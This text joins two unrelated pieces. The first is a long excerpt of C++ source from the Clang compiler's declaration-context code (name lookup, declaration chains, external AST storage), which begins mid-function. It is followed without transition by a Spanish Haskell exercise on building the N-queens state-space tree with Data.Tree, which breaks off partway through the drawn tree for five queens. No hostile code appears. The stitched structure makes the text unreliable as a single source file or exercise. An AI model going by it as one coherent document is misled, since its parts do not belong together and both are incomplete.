| | |
| | `- [2,4,1,3]
| | |
| | `- [5,2,4,1,3]
| |
| `- [5,3]
| |
| `- [2,5,3]
| |
| `- [4,2,5,3]
| |
| `- [1,4,2,5,3]
|
+- [4]
| |
| +- [1,4]
| | |
| | +- [3,1,4]
| | | |
| | | `- [5,3,1,4]
| | | |
| | | `- [2,5,3,1,4]
| | |
| | `- [5,1,4]
| | |
| | `- [2,5,1,4]
| |
| `- [2,4]
| |
| `- [5,2,4]
| |
| `- [3,5,2,4]
| |
| `- [1,3,5,2,4]
|
`- [5]
|
+- [1,5]
| |
| `- [4,1,5]
|
+- [2,5]
| |
| `- [4,2,5]
| |
| `- [1,4,2,5]
| |
| `- [3,1,4,2,5]
|
`- [3,5]
|
`- [1,3,5]
|
`- [4,1,3,5]
|
`- [2,4,1,3,5]
• (nEstados n) es el número de estados en el problema de las n reinas. Por ejemplo,
nEstados 4 == 17
nEstados 5 == 54
map nEstados [0..10] == [1,2,3,6,17,54,153,552,2057,8394,35539]
• (soluciones n) es la lista de estados que son soluciones del problema de las n reinas. Por ejemplo,
λ> soluciones 4
[[3,1,4,2],[2,4,1,3]]
λ> soluciones 5
[[4,2,5,3,1],[3,5,2,4,1],[5,3,1,4,2],[4,1,3,5,2],[5,2,4,1,3],
[1,4,2,5,3],[2,5,3,1,4],[1,3,5,2,4],[3,1,4,2,5],[2,4,1,3,5]]
• (nSoluciones n) es el número de soluciones del problema de las n reinas. Por ejemplo,
nSoluciones 4 == 2
nSoluciones 5 == 10
map nSoluciones [0..10] == [1,1,0,0,2,10,4,40,92,352,724]
Soluciones
import Data.List ((\\))
import Data.Tree
-- Definición de arbolReinas
-- =========================
arbolReinas :: Int -> Tree [Int]
arbolReinas n = expansion n []
where
expansion m xs = Node xs [expansion (m-1) ys | ys <- sucesores n xs]
-- (sucesores n xs) es la lista de los sucesores del estado xs en el
-- problema de las n reinas. Por ejemplo,
-- sucesores 4 [] == [[1],[2],[3],[4]]
-- sucesores 4 [1] == [[3,1],[4,1]]
-- sucesores 4 [4,1] == [[2,4,1]]
-- sucesores 4 [2,4,1] == []
sucesores :: Int -> [Int] -> [[Int]]
sucesores n xs = [y:xs | y <- [1..n] \\ xs
, noAtaca y xs 1]
-- (noAtaca y xs d) se verifica si la reina en la fila y no ataca a las
-- colocadas en las filas xs donde d es el número de columnas desde la
-- de la posición de x a la primera de xs.
noAtaca :: Int -> [Int] -> Int -> Bool
noAtaca _ [] _ = True
noAtaca y (x:xs) distH = abs(y-x) /= distH &&
noAtaca y xs (distH + 1)
-- Definición de nEstados
-- ======================
nEstados :: Int -> Int
nEstados = length . arbolReinas
-- Definición de solucionesReinas
-- ==============================
-- λ> soluciones 4
-- [[3,1,4,2],[2,4,1,3]]
-- λ> soluciones 5
-- [[4,2,5,3,1],[3,5,2,4,1],[5,3,1,4,2],[4,1,3,5,2],[5,2,4,1,3],
-- [1,4,2,5,3],[2,5,3,1,4],[1,3,5,2,4],[3,1,4,2,5],[2,4,1,3,5]]
soluciones :: Int -> [[Int]]
soluciones n =
filter (\xs -> length xs == n) (estados n)
-- (estados n) es la lista de estados del problema de las n reinas. Por
-- ejemplo,
-- λ> estados 4
-- [[],
-- [1],[2],[3],[4],
-- [3,1],[4,1],[4,2],[1,3],[1,4],[2,4],
-- [2,4,1],[1,4,2],[4,1,3],[3,1,4],
-- [3,1,4,2],[2,4,1,3]]
estados :: Int -> [[Int]]
estados = concat . levels . arbolReinas
-- Definición de nSoluciones
-- =========================
nSoluciones :: Int -> Int
nSoluciones = length . soluciones
Una solución de “Espacio de estados del problema de las N reinas
1. fercarnav
import Data.List
import Data.Tree
arbolReinas :: Int -> Tree [Int]
arbolReinas n = unfoldTree f [] where
f xs
| length xs > n = (xs,[])
| length xs == 0 = (xs,[[k] | k <-[1..n]])
| otherwise = (xs,[k:xs | k <- [1..n],
condicion k xs 1,
abs (head xs - k) >=2,
notElem k xs] )
condicion y [] _ = True
condicion y (x:xs) p = abs (y-x) /= p && condicion y xs (p+1)
nEstados :: Int -> Int
nEstados = length . flatten . arbolReinas
soluciones :: Int -> [[Int]]
soluciones n = filter ((==n) . length) (concat (levels (arbolReinas n)))
nSoluciones :: Int -> Int
nSoluciones = length . soluciones
Leave a Reply
Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.
|
__label__pos
| 0.988839 |
Step 3. Specify Microsoft Exchange Connection Settings
At this step of the wizard, specify a Microsoft Exchange server to which you want to connect, provide authentication credentials, assign permissions and configure advanced settings.
To specify connection settings to the on-premises Microsoft Exchange server, do the following:
1. In the Server name field, specify a Microsoft Exchange server to which you want to connect.
You can use a DNS name of a server, NetBIOS name or its IP address. Make sure that the server has the Mailbox Server role.
1. In the Username and Password fields, specify authentication credentials to connect to the Microsoft Exchange server.
You must provide a user account in one of the following formats: domain\account or account@domain. Consider that using ADFS accounts to add on-premises Microsoft organizations is not possible. Only Microsoft 365 organizations can be added with non-MFA enabled ADFS accounts.
1. Select the Grant this account required roles and permissions check box to automatically assign the ApplicationImpersonation role.
Make sure the account that you use is a member of the Organization Management group and has been granted the Role Management role in advance. Otherwise, the automatic assignment of the ApplicationImpersonation role will fail; an organization will not be added.
For more information about the required roles and permissions, see Veeam Backup Account Permissions.
1. Select the Configure throttling policy check box to set the throttling policy for the account being used to Unlimited.
Adding Microsoft On-premises Exchange Organization
1. Click Advanced if you want to configure whether to connect to the Microsoft Exchange server using SSL and to skip one or more SSL verifications. To do this, select or clear any of the following check boxes:
• Connect using SSL
• Skip certificate trusted authority verification
• Skip certificate common name verification
• Skip revocation check
Step 3. Specify Microsoft Exchange Connection Settings
|
__label__pos
| 0.769117 |
How are certain words allowed in comments?
Question
I want to improve WordPress blacklist. WordPress suspends the comment when it catches a word added to the blacklist. But this creates some problems. Because wordpress makes a match. For example, let’s just blacklist the word “press”, in this case, if the user uses the word “WordPress”, comment will be trashed.
In this example only the word “Press” should be banned. An exception must be added and the word “wordpress” must be allowed. Briefly for matching words, I want to add allowed words. In other words, I want to make a special list that is also allowed for words that are inserted in the blacklist filter.
How can we do such a thing in Functions.php?
0
A. Muller 4 months 0 Answers 18 views 0
Leave an answer
|
__label__pos
| 0.999845 |
crossval
Estimate loss using cross-validation
Description
example
err = crossval(criterion,X,y,'Predfun',predfun) returns a 10-fold cross-validation error estimate for the function predfun based on the specified criterion, either 'mse' (mean squared error) or 'msc' (misclassification rate). The rows of X and y correspond to observations, and the columns of X correspond to predictor variables.
In this case, crossval performs 10-fold cross-validation as follows:
1. Split the observations in the predictor data X and the response variable y into 10 groups, each of which has approximately the same number of observations.
2. Use the last nine groups of observations to train a model as specified in predfun. Use the first group of observations as test data, pass the test predictor data to the trained model, and compute predicted values as specified in predfun. Compute the error specified by criterion.
3. Use the first group and the last eight groups of observations to train a model as specified in predfun. Use the second group of observations as test data, pass the test data to the trained model, and compute predicted values as specified in predfun. Compute the error specified by criterion.
4. Proceed in a similar manner until each group of observations is used as test data exactly once.
5. Return the mean error estimate as the scalar err.
example
err = crossval(criterion,X1,...,XN,y,'Predfun',predfun) returns a 10-fold cross-validation error estimate for predfun by using the predictor variables X1 through XN and the response variable y.
example
values = crossval(fun,X) performs 10-fold cross-validation for the function fun, applied to the data in X. The rows of X correspond to observations, and the columns of X correspond to variables.
crossval typically performs 10-fold cross-validation as follows:
1. Split the data in X into 10 groups, each of which has approximately the same number of observations.
2. Use the last nine groups of data to train a model as specified in fun. Use the first group of data as a test set, pass the test set to the trained model, and compute some value (for example, loss) as specified in fun.
3. Use the first group and the last eight groups of data to train a model as specified in fun. Use the second group of data as a test set, pass the test set to the trained model, and compute some value as specified in fun.
4. Proceed in a similar manner until each group of data is used as a test set exactly once.
5. Return the 10 computed values as the vector values.
example
values = crossval(fun,X1,...,XN) performs 10-fold cross-validation for the function fun, applied to the data in X1,...,XN. Every data set, X1 through XN, must have the same number of observations and, therefore, the same number of rows.
example
___ = crossval(___,Name,Value) specifies cross-validation options using one or more name-value pair arguments in addition to any of the input argument combinations and output arguments in previous syntaxes. For example, 'KFold',5 specifies to perform 5-fold cross-validation.
Examples
collapse all
Compute the mean squared error of a regression model by using 10-fold cross-validation.
Load the carsmall data set. Put the acceleration, horsepower, weight, and miles per gallon (MPG) values into the matrix data. Remove any rows that contain NaN values.
load carsmall
data = [Acceleration Horsepower Weight MPG];
data(any(isnan(data),2),:) = [];
Specify the last column of data, which corresponds to MPG, as the response variable y. Specify the other columns of data as the predictor data X. Add a column of ones to X when your regression function uses regress, as in this example.
Note: regress is useful when you simply need the coefficient estimates or residuals of a regression model. If you need to investigate a fitted regression model further, create a linear regression model object by using fitlm. For an example that uses fitlm and crossval, see Compute Mean Absolute Error Using Cross-Validation.
y = data(:,4);
X = [ones(length(y),1) data(:,1:3)];
Create the custom function regf (shown at the end of this example). This function fits a regression model to training data and then computes predicted values on a test set.
Note: If you use the live script file for this example, the regf function is already included at the end of the file. Otherwise, you need to create this function at the end of your .m file or add it as a file on the MATLAB® path.
Compute the default 10-fold cross-validation mean squared error for the regression model with predictor data X and response variable y.
rng('default') % For reproducibility
cvMSE = crossval('mse',X,y,'Predfun',@regf)
cvMSE = 17.5399
This code creates the function regf.
function yfit = regf(Xtrain,ytrain,Xtest)
b = regress(ytrain,Xtrain);
yfit = Xtest*b;
end
Compute the misclassification error of a logistic regression model trained on numeric and categorical predictor data by using 10-fold cross-validation.
Load the patients data set. Specify the numeric variables Diastolic and Systolic and the categorical variable Gender as predictors, and specify Smoker as the response variable.
load patients
X1 = Diastolic;
X2 = categorical(Gender);
X3 = Systolic;
y = Smoker;
Create the custom function classf (shown at the end of this example). This function fits a logistic regression model to training data and then classifies test data.
Note: If you use the live script file for this example, the classf function is already included at the end of the file. Otherwise, you need to create this function at the end of your .m file or add it as a file on the MATLAB® path.
Compute the 10-fold cross-validation misclassification error for the model with predictor data X1, X2, and X3 and response variable y. Specify 'Stratify',y to ensure that training and test sets have roughly the same proportion of smokers.
rng('default') % For reproducibility
err = crossval('mcr',X1,X2,X3,y,'Predfun',@classf,'Stratify',y)
err = 0.1100
This code creates the function classf.
function pred = classf(X1train,X2train,X3train,ytrain,X1test,X2test,X3test)
Xtrain = table(X1train,X2train,X3train,ytrain, ...
'VariableNames',{'Diastolic','Gender','Systolic','Smoker'});
Xtest = table(X1test,X2test,X3test, ...
'VariableNames',{'Diastolic','Gender','Systolic'});
modelspec = 'Smoker ~ Diastolic + Gender + Systolic';
mdl = fitglm(Xtrain,modelspec,'Distribution','binomial');
yfit = predict(mdl,Xtest);
pred = (yfit > 0.5);
end
For a given number of clusters, compute the cross-validated sum of squared distances between observations and their nearest cluster center. Compare the results for one through ten clusters.
Load the fisheriris data set. X is the matrix meas, which contains flower measurements for 150 different flowers.
load fisheriris
X = meas;
Create the custom function clustf (shown at the end of this example). This function performs the following steps:
1. Standardize the training data.
2. Separate the training data into k clusters.
3. Transform the test data using the training data mean and standard deviation.
4. Compute the distance from each test data point to the nearest cluster center, or centroid.
5. Compute the sum of the squares of the distances.
Note: If you use the live script file for this example, the clustf function is already included at the end of the file. Otherwise, you need to create the function at the end of your .m file or add it as a file on the MATLAB® path.
Create a for loop that specifies the number of clusters k for each iteration. For each fixed number of clusters, pass the corresponding clustf function to crossval. Because crossval performs 10-fold cross-validation by default, the software computes 10 sums of squared distances, one for each partition of training and test data. Take the sum of those values; the result is the cross-validated sum of squared distances for the given number of clusters.
rng('default') % For reproducibility
cvdist = zeros(5,1);
for k = 1:10
fun = @(Xtrain,Xtest)clustf(Xtrain,Xtest,k);
distances = crossval(fun,X);
cvdist(k) = sum(distances);
end
Plot the cross-validated sum of squared distances for each number of clusters.
plot(cvdist)
xlabel('Number of Clusters')
ylabel('CV Sum of Squared Distances')
In general, when determining how many clusters to use, consider the greatest number of clusters that corresponds to a significant decrease in the cross-validated sum of squared distances. For this example, using two or three clusters seems appropriate, but using more than three clusters does not.
This code creates the function clustf.
function distances = clustf(Xtrain,Xtest,k)
[Ztrain,Zmean,Zstd] = zscore(Xtrain);
[~,C] = kmeans(Ztrain,k); % Creates k clusters
Ztest = (Xtest-Zmean)./Zstd;
d = pdist2(C,Ztest,'euclidean','Smallest',1);
distances = sum(d.^2);
end
Compute the mean absolute error of a regression model by using 10-fold cross-validation.
Load the carsmall data set. Specify the Acceleration and Displacement variables as predictors and the Weight variable as the response.
load carsmall
X1 = Acceleration;
X2 = Displacement;
y = Weight;
Create the custom function regf (shown at the end of this example). This function fits a regression model to training data and then computes predicted car weights on a test set. The function compares the predicted car weight values to the true values, and then computes the mean absolute error (MAE) and the MAE adjusted to the range of the test set car weights.
Note: If you use the live script file for this example, the regf function is already included at the end of the file. Otherwise, you need to create this function at the end of your .m file or add it as a file on the MATLAB® path.
By default, crossval performs 10-fold cross-validation. For each of the 10 training and test set partitions of the data in X1, X2, and y, compute the MAE and adjusted MAE values using the regf function. Find the mean MAE and mean adjusted MAE.
rng('default') % For reproducibility
values = crossval(@regf,X1,X2,y)
values = 10×2
319.2261 0.1132
342.3722 0.1240
214.3735 0.0902
174.7247 0.1128
189.4835 0.0832
249.4359 0.1003
194.4210 0.0845
348.7437 0.1700
283.1761 0.1187
210.7444 0.1325
mean(values)
ans = 1×2
252.6701 0.1129
This code creates the function regf.
function errors = regf(X1train,X2train,ytrain,X1test,X2test,ytest)
tbltrain = table(X1train,X2train,ytrain, ...
'VariableNames',{'Acceleration','Displacement','Weight'});
tbltest = table(X1test,X2test,ytest, ...
'VariableNames',{'Acceleration','Displacement','Weight'});
mdl = fitlm(tbltrain,'Weight ~ Acceleration + Displacement');
yfit = predict(mdl,tbltest);
MAE = mean(abs(yfit-tbltest.Weight));
adjMAE = MAE/range(tbltest.Weight);
errors = [MAE adjMAE];
end
Compute the misclassification error of a classification tree by using principal component analysis (PCA) and 5-fold cross-validation.
Load the fisheriris data set. The meas matrix contains flower measurements for 150 different flowers. The species variable lists the species for each flower.
load fisheriris
Create the custom function classf (shown at the end of this example). This function fits a classification tree to training data and then classifies test data. Use PCA inside the function to reduce the number of predictors used to create the tree model.
Note: If you use the live script file for this example, the classf function is already included at the end of the file. Otherwise, you need to create this function at the end of your .m file or add it as a file on the MATLAB® path.
Create a cvpartition object for stratified 5-fold cross-validation. By default, cvpartition ensures that training and test sets have roughly the same proportions of flower species.
rng('default') % For reproducibility
cvp = cvpartition(species,'KFold',5);
Compute the 5-fold cross-validation misclassification error for the classification tree with predictor data meas and response variable species.
cvError = crossval('mcr',meas,species,'Predfun',@classf,'Partition',cvp)
cvError = 0.1067
This code creates the function classf.
function yfit = classf(Xtrain,ytrain,Xtest)
% Standardize the training predictor data. Then, find the
% principal components for the standardized training predictor
% data.
[Ztrain,Zmean,Zstd] = zscore(Xtrain);
[coeff,scoreTrain,~,~,explained,mu] = pca(Ztrain);
% Find the lowest number of principal components that account
% for at least 95% of the variability.
n = find(cumsum(explained)>=95,1);
% Find the n principal component scores for the standardized
% training predictor data. Train a classification tree model
% using only these scores.
scoreTrain95 = scoreTrain(:,1:n);
mdl = fitctree(scoreTrain95,ytrain);
% Find the n principal component scores for the transformed
% test data. Classify the test data.
Ztest = (Xtest-Zmean)./Zstd;
scoreTest95 = (Ztest-mu)*coeff(:,1:n);
yfit = predict(mdl,scoreTest95);
end
Create a confusion matrix from the 10-fold cross-validation results of a discriminant analysis model.
Note: Use classify when training speed is a concern. Otherwise, use fitcdiscr to create a discriminant analysis model. For an example that shows the same workflow as this example, but uses fitcdiscr, see Create Confusion Matrix Using Cross-Validation Predictions.
Load the fisheriris data set. X contains flower measurements for 150 different flowers, and y lists the species for each flower. Create a variable order that specifies the order of the flower species.
load fisheriris
X = meas;
y = species;
order = unique(y)
order = 3x1 cell
{'setosa' }
{'versicolor'}
{'virginica' }
Create a function handle named func for a function that completes the following steps:
• Take in training data (Xtrain and ytrain) and test data (Xtest and ytest).
• Use the training data to create a discriminant analysis model that classifies new data (Xtest). Create this model and classify new data by using the classify function.
• Compare the true test data classes (ytest) to the predicted test data values, and create a confusion matrix of the results by using the confusionmat function. Specify the class order by using 'Order',order.
func = @(Xtrain,ytrain,Xtest,ytest)confusionmat(ytest, ...
classify(Xtest,Xtrain,ytrain),'Order',order);
Create a cvpartition object for stratified 10-fold cross-validation. By default, cvpartition ensures that training and test sets have roughly the same proportions of flower species.
rng('default') % For reproducibility
cvp = cvpartition(y,'Kfold',10);
Compute the 10 test set confusion matrices for each partition of the predictor data X and response variable y. Each row of confMat corresponds to the confusion matrix results for one test set. Aggregate the results and create the final confusion matrix cvMat.
confMat = crossval(func,X,y,'Partition',cvp);
cvMat = reshape(sum(confMat),3,3)
cvMat = 3×3
50 0 0
0 48 2
0 1 49
Plot the confusion matrix as a confusion matrix chart by using confusionchart.
confusionchart(cvMat,order)
Input Arguments
collapse all
Type of error estimate, specified as either 'mse' or 'mcr'.
ValueDescription
'mse'Mean squared error (MSE) — Appropriate for regression algorithms only
'mcr'Misclassification rate, or proportion of misclassified observations — Appropriate for classification algorithms only
Data set, specified as a column vector, matrix, or array. The rows of X correspond to observations, and the columns of X generally correspond to variables. If you pass multiple data sets X1,...,XN to crossval, then all data sets must have the same number of rows.
Data Types: single | double | logical | char | string | cell | categorical
Response data, specified as a column vector or character array. The rows of y correspond to observations, and y must have the same number of rows as the predictor data X or X1,...,XN.
Data Types: single | double | logical | char | string | cell | categorical
Prediction function, specified as a function handle. You must create this function as an anonymous function, a function defined at the end of the .m or .mlx file containing the rest of your code, or a file on the MATLAB® path.
This table describes the required function syntax, given the type of predictor data passed to crossval.
ValuePredictor DataFunction Syntax
@myfunctionX
function yfit = myfunction(Xtrain,ytrain,Xtest)
% Calculate predicted response
...
end
• Xtrain — Subset of the observations in X used as training predictor data. The function uses Xtrain and ytrain to construct a classification or regression model.
• ytrain — Subset of the responses in y used as training response data. The rows of ytrain correspond to the same observations in the rows of Xtrain. The function uses Xtrain and ytrain to construct a classification or regression model.
• Xtest — Subset of the observations in X used as test predictor data. The function uses Xtest and the model trained on Xtrain and ytrain to compute the predicted values yfit.
• yfit — Set of predicted values for observations in Xtest. The yfit values form a column vector with the same number of rows as Xtest.
@myfunctionX1,...,XN
function yfit = myfunction(X1train,...,XNtrain,ytrain,X1test,...,XNtest)
% Calculate predicted response
...
end
• X1train,...,XNtrain — Subsets of the predictor data in X1,...,XN, respectively, that are used as training predictor data. The rows of X1train,...,XNtrain correspond to the same observations. The function uses X1train,...,XNtrain and ytrain to construct a classification or regression model.
• ytrain — Subset of the responses in y used as training response data. The rows of ytrain correspond to the same observations in the rows of X1train,...,XNtrain. The function uses X1train,...,XNtrain and ytrain to construct a classification or regression model.
• X1test,...,XNtest — Subsets of the observations in X1,...,XN, respectively, that are used as test predictor data. The rows of X1test,...,XNtest correspond to the same observations. The function uses X1test,...,XNtest and the model trained on X1train,...,XNtrain and ytrain to compute the predicted values yfit.
• yfit — Set of predicted values for observations in X1test,...,XNtest. The yfit values form a column vector with the same number of rows as X1test,...,XNtest.
Example: @(Xtrain,ytrain,Xtest)(Xtest*regress(ytrain,Xtrain));
Data Types: function_handle
Function to cross-validate, specified as a function handle. You must create this function as an anonymous function, a function defined at the end of the .m or .mlx file containing the rest of your code, or a file on the MATLAB path.
This table describes the required function syntax, given the type of data passed to crossval.
ValueDataFunction Syntax
@myfunctionX
function value = myfunction(Xtrain,Xtest)
% Calculation of value
...
end
• Xtrain — Subset of the observations in X used as training data. The function uses Xtrain to construct a model.
• Xtest — Subset of the observations in X used as test data. The function uses Xtest and the model trained on Xtrain to compute value.
• value — Quantity or variable. In most cases, value is a numeric scalar representing a loss estimate. value can also be an array, provided that the array size is the same for each partition of training and test data. If you want to return a variable output that can change size depending on the data partition, set value to be the cell scalar {output} instead.
@myfunctionX1,...,XN
function value = myfunction(X1train,...,XNtrain,X1test,...,XNtest)
% Calculation of value
...
end
• X1train,...,XNtrain — Subsets of the data in X1,...,XN, respectively, that are used as training data. The rows of X1train,...,XNtrain correspond to the same observations. The function uses X1train,...,XNtrain to construct a model.
• X1test,...,XNtest — Subsets of the data in X1,...,XN, respectively, that are used as test data. The rows of X1test,...,XNtest correspond to the same observations. The function uses X1test,...,XNtest and the model trained on X1train,...,XNtrain to compute value.
• value — Quantity or variable. In most cases, value is a numeric scalar representing a loss estimate. value can also be an array, provided that the array size is the same for each partition of training and test data. If you want to return a variable output that can change size depending on the data partition, set value to be the cell scalar {output} instead.
Data Types: function_handle
Name-Value Pair Arguments
Specify optional comma-separated pairs of Name,Value arguments. Name is the argument name and Value is the corresponding value. Name must appear inside quotes. You can specify several name and value pair arguments in any order as Name1,Value1,...,NameN,ValueN.
Example: crossval('mcr',meas,species,'Predfun',@classf,'KFold',5,'Stratify',species) specifies to compute the stratified 5-fold cross-validation misclassification rate for the classf function with predictor data meas and response variable species.
Fraction or number of observations used for holdout validation, specified as the comma-separated pair consisting of 'Holdout' and a scalar value in the range (0,1) or a positive integer scalar.
• If the Holdout value p is a scalar in the range (0,1), then crossval randomly selects and reserves approximately p*100% of the observations as test data.
• If the Holdout value p is a positive integer scalar, then crossval randomly selects and reserves p observations as test data.
In either case, crossval then trains the model specified by either fun or predfun using the rest of the data. Finally, the function uses the test data along with the trained model to compute either values or err.
You can use only one of these four name-value pair arguments: Holdout, KFold, Leaveout, and Partition.
Example: 'Holdout',0.3
Example: 'Holdout',50
Data Types: single | double
Number of folds for k-fold cross-validation, specified as the comma-separated pair consisting of 'KFold' and a positive integer scalar greater than 1.
If you specify 'KFold',k, then crossval randomly partitions the data into k sets. For each set, the function reserves the set as test data, and trains the model specified by either fun or predfun using the other k – 1 sets. crossval then uses the test data along with the trained model to compute either values or err.
You can use only one of these four name-value pair arguments: Holdout, KFold, Leaveout, and Partition.
Example: 'KFold',5
Data Types: single | double
Leave-one-out cross-validation, specified as the comma-separated pair consisting of 'Leaveout' and 1.
If you specify 'Leaveout',1, then for each observation, crossval reserves the observation as test data, and trains the model specified by either fun or predfun using the other observations. The function then uses the test observation along with the trained model to compute either values or err.
You can use only one of these four name-value pair arguments: Holdout, KFold, Leaveout, and Partition.
Example: 'Leaveout',1
Data Types: single | double
Number of Monte Carlo repetitions for validation, specified as the comma-separated pair consisting of 'MCReps' and a positive integer scalar. If the first input of crossval is 'mse' or 'mcr' (see criterion), then crossval returns the mean MSE or misclassification rate across all Monte Carlo repetitions. Otherwise, crossval concatenates the values from all Monte Carlo repetitions along the first dimension.
If you specify both Partition and MCReps, then the first Monte Carlo repetition uses the partition information in the cvpartition object, and the software calls the repartition object function to generate new partitions for each of the remaining repetitions.
Example: 'MCReps',5
Data Types: single | double
Cross-validation partition, specified as the comma-separated pair consisting of 'Partition' and a cvpartition partition object created by cvpartition. The partition object specifies the type of cross-validation and the indexing for the training and test sets.
When you use crossval, you cannot specify both Partition and Stratify. Instead, directly specify a stratified partition when you create the cvpartition partition object.
You can use only one of these four name-value pair arguments: Holdout, KFold, Leaveout, and Partition.
Variable specifying the groups used for stratification, specified as the comma-separated pair consisting of 'Stratify' and a column vector with the same number of rows as the data X or X1,...,XN.
When you specify Stratify, both the training and test sets have roughly the same class proportions as in the Stratify vector. The software treats NaNs, empty character vectors, empty strings, <missing> values, and <undefined> values in Stratify as missing data values, and ignores the corresponding rows of the data.
A good practice is to use stratification when you use cross-validation with classification algorithms. Otherwise, some test sets might not include observations for all classes.
When you use crossval, you cannot specify both Partition and Stratify. Instead, directly specify a stratified partition when you create the cvpartition partition object.
Data Types: single | double | logical | string | cell | categorical
Options for running computations in parallel and setting random streams, specified as the comma-separated pair consisting of 'Options' and a structure. Create the Options structure with statset. This table lists the option fields and their values.
Field NameValueDefault
UseParallelSet this value to true to run computations in parallel.false
UseSubstreams
Set this value to true to run computations in parallel in a reproducible manner.
To compute reproducibly, set Streams to a type that allows substreams: 'mlfg6331_64' or 'mrg32k3a'.
false
StreamsSpecify this value as a RandStream object or a cell array consisting of one such object.If you do not specify Streams, then crossval uses the default stream.
Note
You need Parallel Computing Toolbox™ to run computations in parallel.
Example: 'Options',statset('UseParallel',true)
Data Types: struct
Output Arguments
collapse all
Mean squared error or misclassification rate, returned as a numeric scalar. The type of error depends on the criterion value.
Loss values, returned as a column vector or matrix. Each row of values corresponds to the output of fun for one partition of training and test data.
If the output returned by fun is multidimensional, then crossval reshapes the output and fits it into one row of values. For an example, see Create Confusion Matrix Using Cross-Validation.
Tips
• A good practice is to use stratification (see Stratify) when you use cross-validation with classification algorithms. Otherwise, some test sets might not include observations for all classes.
Alternative Functionality
Many classification and regression functions allow you to perform cross-validation directly.
• When you use fit functions such as fitcsvm, fitctree, and fitrtree, you can specify cross-validation options by using name-value pair arguments. Alternatively, you can first create models with these fit functions and then create a partitioned object by using the crossval object function. Use the kfoldLoss and kfoldPredict object functions to compute the loss and predicted values for the partitioned object. For more information, see ClassificationPartitionedModel and RegressionPartitionedModel.
• You can also specify cross-validation options when you perform lasso or elastic net regularization using lasso and lassoglm.
Extended Capabilities
Introduced in R2008a
|
__label__pos
| 0.722474 |
All
How to download excel file in vuejs?
How do I download a file using Vue JS?
1. Step 1: Install Vue CLI.
2. Step 2: Download Vue Project.
3. Step 3: Install Axios in Vue.
4. Step 4: Create Download File Component.
5. Step 5: Register Download File Component.
6. Step 6: Start Vue Application.
How can I download Excel file in Web API?
1. Add the Model Class “Record. cs” in the model folder. In the “Solution Explorer”.
2. In the “HomeController” write some code to export the Excel file. This Excel file exists: In the “Solution Explorer”.
3. Now write some HTML code in the “index. cshtml” file. This file exists:
How can I download Excel file using Javascript?
Back to top button
|
__label__pos
| 1 |
Pete Pete - 8 months ago 87
Swift Question
URLSession Conversion to Swift 3
I have converted to Swift 3 and receiving the error message
'Cannot convert value of type (UnsafeRawPointer, NSRange,
UnsafeMutablePointer)->() to (UnsafeBufferPointer,
Data.index, inout Bool)-> Void.
My code:
func urlSession(_ session: URLSession, dataTask: URLSessionDataTask,
didReceive data: Data) {
data.enumerateBytes{[weak self]
(pointer: UnsafeRawPointer,
range: NSRange,
stop: UnsafeMutablePointer<ObjCBool>) in
let newData = Data(bytes: UnsafePointer<UInt8>(pointer), count: range.length)
self!.mutableData.append(newData)
} }
What do I need to adapt to make it work?
Answer
You are already getting Data object and you want to append the data, then why are you doing all these things
func urlSession(_ session: URLSession, dataTask: URLSessionDataTask, didReceive data: Data){
responseData?.append(data)
}
This will work fine.
For reference, look at https://github.com/ankitthakur/SwiftNetwork/tree/master/Sources/Shared
|
__label__pos
| 0.993893 |
postinstall script packagemaker
Discussion in 'Mac Programming' started by BollywooD, Oct 18, 2009.
1. BollywooD macrumors 6502
BollywooD
Joined:
Apr 27, 2005
Location:
Hamburg
#1
how do I delete a key in a plist file, in a postinstall script?
I have tried:
Code:
#!/bin/sh
defaults delete $HOME/Library/Preferences/com.apple.Safari myKeyToDelete
the script deletes the entire plist file though, not the key?
what am I doing wrong.
2. Guiyon macrumors 6502a
Joined:
Mar 19, 2008
Location:
North Shore, MA
#2
IIRC, defaults does not use the path to the plist file, instead it uses the reverse-DN of the domain you want to alter. In this case it will be com.apple.Safari
So, according to the man page, you would want to call:
Code:
/usr/bin/defaults delete com.apple.Safari <KeyName>
3. BollywooD thread starter macrumors 6502
BollywooD
Joined:
Apr 27, 2005
Location:
Hamburg
#3
I tried this:
Code:
#!/bin/sh
/usr/bin/defaults delete myKeyToDelete
which generates an error in the installer, and doesn't delete the key.
and this one:
Code:
#!/bin/sh
MY_UNUSED_KEY="com.apple.Safari myKeyToDelete"
if [ -d "MY_UNUSED_KEY" ]; then
echo "Removing unused preferences"
/usr/bin/defaults delete "MY_UNUSED_KEY"
fi
which doesnt generate an error, but also doesnt delete the key?
this shouldnt be that difficult....
4. Guiyon macrumors 6502a
Joined:
Mar 19, 2008
Location:
North Shore, MA
#4
Reread the command I posted. You forgot to specify the domain you wanted to remove the key from.
5. BollywooD thread starter macrumors 6502
BollywooD
Joined:
Apr 27, 2005
Location:
Hamburg
#5
I tried this too:
Code:
/usr/bin/defaults delete ~/Library/Preferences/com.apple.Safari myKeyToDelete
this deletes the entire plist file....
stupid PackageMaker!?...
6. BollywooD thread starter macrumors 6502
BollywooD
Joined:
Apr 27, 2005
Location:
Hamburg
#6
I also posted the question to the installer-dev mailing lists, and found the solution to be:
Code:
su $USER -c "defaults delete com.apple.Safari myKeyToDelete"
:D
7. Guiyon macrumors 6502a
Joined:
Mar 19, 2008
Location:
North Shore, MA
#7
Which is the exact command I posted.
8. chown33 macrumors 604
Joined:
Aug 9, 2009
Location:
Sailing beyond the sunset
#8
That shell script doesn't work because you're using the literal string "MY_UNUSED_KEY", rather than expanding the value of the shell variable. To expand the shell variable, you should use "$MY_UNUSED_KEY".
Also, your defaults delete ... line is wrong for a second reason: you're quoting the expanded shell variable. So even if you had this:
Code:
/usr/bin/defaults delete "$MY_UNUSED_KEY"
It would still be wrong, because it would expand to this:
Code:
/usr/bin/defaults delete "com.apple.Safari myKeyToDelete"
It pays to actually understand the tools you're working with, whether that's the defaults command or the syntax of shell variables. RTFM.
It also pays to read replies before posting other failed attempts. RTFR.
9. BollywooD thread starter macrumors 6502
BollywooD
Joined:
Apr 27, 2005
Location:
Hamburg
#9
Thanks for the crash course, Im only just gettng to grips with Obj-C, and now I need to learn another language....
:)
Share This Page
|
__label__pos
| 0.805773 |
Час с ботом, имитирующий общение
D
На сайте с 01.09.2015
Offline
59
236
Имеется скрипт чат бота имитирующий общение с саппортом, но в данном примере бот отвечает сообщение после отправки сообщения пользователя, как сделать так, чтобы бот писал в данный чат рандомно независимо от действий пользователя?
<div id="test">
<div class="avatar"><div id="closed" class="closed"></div>
<div id="ava" class="ava"></div>
<div class="fio">
Гавриил Гавриилович
</div>
<div class="thepost">
дЫрэктар
</div>
<div id="print">
